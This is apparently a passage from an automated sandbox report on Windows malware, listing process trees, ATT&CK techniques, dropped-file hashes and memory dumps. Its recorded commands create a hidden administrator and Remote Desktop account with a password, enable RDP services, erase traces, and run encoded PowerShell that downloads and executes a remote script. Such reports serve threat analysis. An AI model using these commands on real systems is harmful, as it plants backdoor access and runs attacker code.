    PID:1084
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2384
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1504
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:532
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3364
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1580
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:508
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1840
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2872
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1612

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:260

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc fF3NqKBE /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4792
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc fF3NqKBE /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc fF3NqKBE /add
    3⤵
    PID:2124

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:920
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:4872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2940

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" OZLIASEW$ /ADD
1⤵
PID:404
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" OZLIASEW$ /ADD
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" OZLIASEW$ /ADD
    3⤵
    PID:4528

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:3140
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:3252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2764

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc fF3NqKBE
1⤵
PID:2132
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc fF3NqKBE
  2⤵
  PID:4172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc fF3NqKBE
    3⤵
    PID:3644

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1984
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:2916

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1060
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2488

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:872
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1EAE.tmp

Filesize
1KB

MD5
6d60c272612cf078f83222430ee43f2c

SHA1
eeb3b9e4300cbc786c9874800ee7a52f2725610d

SHA256
300aa043a8e9aefb267832837152e08b273b39b497784ea010cf5f9b487068c2

SHA512
84e1d9df4f27105a6983bb7019453c91790f52f3efa1dfd37092d0d76eef8c04e0a74b61bb6241613f1af7e462cdd36f8393b98b5a5e8bd5425b960fedbb7cb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gl03uk2w.wbb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bq2bw3pc\bq2bw3pc.dll

Filesize
3KB

MD5
6d40a5ee7e044865bd75bbfa81ccb964

SHA1
74b2bba61b5e5d27a873d6e5e320a79efe1a2a10

SHA256
a57cc886fb991b33c140c4b29d7d791b8f6e07c9b41c73a495f3ba743ce21f3f

SHA512
9068fb6d6694dc85bdf08ec415be14565e507289c89d4c1ad39e0c621d5a6e2be36a54445401877c471b8f52e972033cda7cb3f704a0ea31bfec1ad2995f36f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
90c8165a2ca1c584008751e6604aac5f

SHA1
c1b2545af59ec7acdec29e91c667aa74a12b9742

SHA256
2099da06514de677962d66f90b822084878cd4d9bb9e62bfa8c4ed728ddfa974

SHA512
9d2e477e0b600ae0d82fac78bdabfdb005033c20e28d7c76fb48111a426e315e9bb7e8da5daeb2824dc92c5e084f52aa33c1d5e680fe566c3f21d96b838799a0

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
615f99f0e93e2cc4c6a3a572835fd63d

SHA1
c383f93e9a47adc4d4b265fadfcc3feaf0980a91

SHA256
bc0a2d80569c16b63f59d629c91bfa40f76247e39c2a41dbffb0e41d1eea9ee8

SHA512
dd1196a3067f740be9c8d3cbcfcb7ec511f77daf3ba28929ef8e989597d7a9de5a59e990a7edda5491ef75413967c7db42e6941ec51523428f7fd6a8353f21ba

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
5b49a655bf1bd6bcb3551bb1cba2a97b

SHA1
a32f1358093e7e3d8ab6abcc286fc2d92a501f78

SHA256
40bbfb4ea867dff557fa9f20ef53d2b31708c847d2c4b601a55f9eabe69c57ca

SHA512
7de6b4bbc1bce7c12a6e7d730f62a6ca33106d9088a0d06e9beba0f94cd8e5a5fcc3d22ebfdcc62467e417dc85f909daf8094b69cd905dfff17fe0981ef7858a

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE13E.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bq2bw3pc\CSC5AD5ECE52A2F4DC2911258C2A78DB4CF.TMP

Filesize
652B

MD5
53c98010f615b5215b7315b890f05826

SHA1
44be79ebc96bf00e8fe9f7166555f33ac7b23438

SHA256
5753e5a91b8ab0e4bd8c6809ddd3131946eeeed4ed7e9db59d880aebe14474ff

SHA512
19050156676886e1d6909c4224b867e09ad7f9d6daf34601e8c2c64e2236e5d36c59fbe4d0980be7789cd2528f2b6191f6d49d76a6ad14bc5184e579021e85e5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bq2bw3pc\bq2bw3pc.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bq2bw3pc\bq2bw3pc.cmdline

Filesize
369B

MD5
cf516dad84970566369cc41a069a62a9

SHA1
87ada582cfea248353ba037b9303f2669a085aaa

SHA256
9e6a3af951f465e0fd5a953eccfbbc863f3eb8cf74d2fd2b9e0bd1daa46096f2

SHA512
1e068a717b8a7d293a2811deba0130ef1a4f7ac7ae88af460ee04581be988371d1c5912c8c960a2d726d65d1c4a0f8b6680091c5ba1650b38d96295da4ac1cee

Download Submit
memory/1268-69-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1268-59-0x0000014AB4FD0000-0x0000014AB4FE0000-memory.dmp

Filesize
64KB

Download
memory/1268-57-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1268-58-0x0000014AB4FD0000-0x0000014AB4FE0000-memory.dmp

Filesize
64KB

Download
memory/1476-107-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1476-108-0x000001E3ECB80000-0x000001E3ECB90000-memory.dmp

Filesize
64KB

Download
memory/1476-150-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1788-53-0x0000022C7F3A0000-0x0000022C7F3B0000-memory.dmp

Filesize
64KB

Download
memory/1788-8-0x0000022C7F3A0000-0x0000022C7F3B0000-memory.dmp

Filesize
64KB

Download
memory/1788-154-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1788-153-0x00007FF9A94B0000-0x00007FF9A94C9000-memory.dmp

Filesize
100KB

Download
memory/1788-105-0x0000022C7F3A0000-0x0000022C7F3B0000-memory.dmp

Filesize
64KB

Download
memory/1788-52-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1788-7-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1788-39-0x0000022C80270000-0x0000022C8047A000-memory.dmp

Filesize
2.0MB

Download
memory/1788-55-0x0000022C7F3A0000-0x0000022C7F3B0000-memory.dmp

Filesize
64KB

Download
memory/1788-20-0x0000022C7F3A0000-0x0000022C7F3B0000-memory.dmp

Filesize
64KB

Download
memory/1788-38-0x0000022C7FEE0000-0x0000022C80056000-memory.dmp

Filesize
1.5MB

Download
memory/1788-35-0x0000022C18280000-0x0000022C18288000-memory.dmp

Filesize
32KB

Download
memory/1788-85-0x0000022C7F3A0000-0x0000022C7F3B0000-memory.dmp

Filesize
64KB

Download
memory/1788-16-0x0000022C7F210000-0x0000022C7F232000-memory.dmp

Filesize
136KB

Download
memory/1788-83-0x00007FF9A94B0000-0x00007FF9A94C9000-memory.dmp

Filesize
100KB

Download
memory/1996-56-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1996-46-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/1996-50-0x000001CBA0AA0000-0x000001CBA0AB0000-memory.dmp

Filesize
64KB

Download
memory/1996-51-0x000001CBA0AA0000-0x000001CBA0AB0000-memory.dmp

Filesize
64KB

Download
memory/1996-54-0x000001CBA0AA0000-0x000001CBA0AB0000-memory.dmp

Filesize
64KB

Download
memory/2736-21-0x0000024EF9FE0000-0x0000024EF9FF0000-memory.dmp

Filesize
64KB

Download
memory/2736-9-0x0000024EF9FE0000-0x0000024EF9FF0000-memory.dmp

Filesize
64KB

Download
memory/2736-0-0x0000024EFC420000-0x0000024EFC846000-memory.dmp

Filesize
4.1MB

Download
memory/2736-6-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/2736-2-0x0000024EF9FE0000-0x0000024EF9FF0000-memory.dmp

Filesize
64KB

Download
memory/2736-3-0x0000024EF9FE0000-0x0000024EF9FF0000-memory.dmp

Filesize
64KB

Download
memory/2736-1-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/2736-156-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/4828-71-0x0000027FDCD70000-0x0000027FDCD80000-memory.dmp

Filesize
64KB

Download
memory/4828-70-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/4828-82-0x00007FF99B3A0000-0x00007FF99BE61000-memory.dmp

Filesize
10.8MB

Download
memory/4828-81-0x0000027FDCD70000-0x0000027FDCD80000-memory.dmp

Filesize
64KB

Download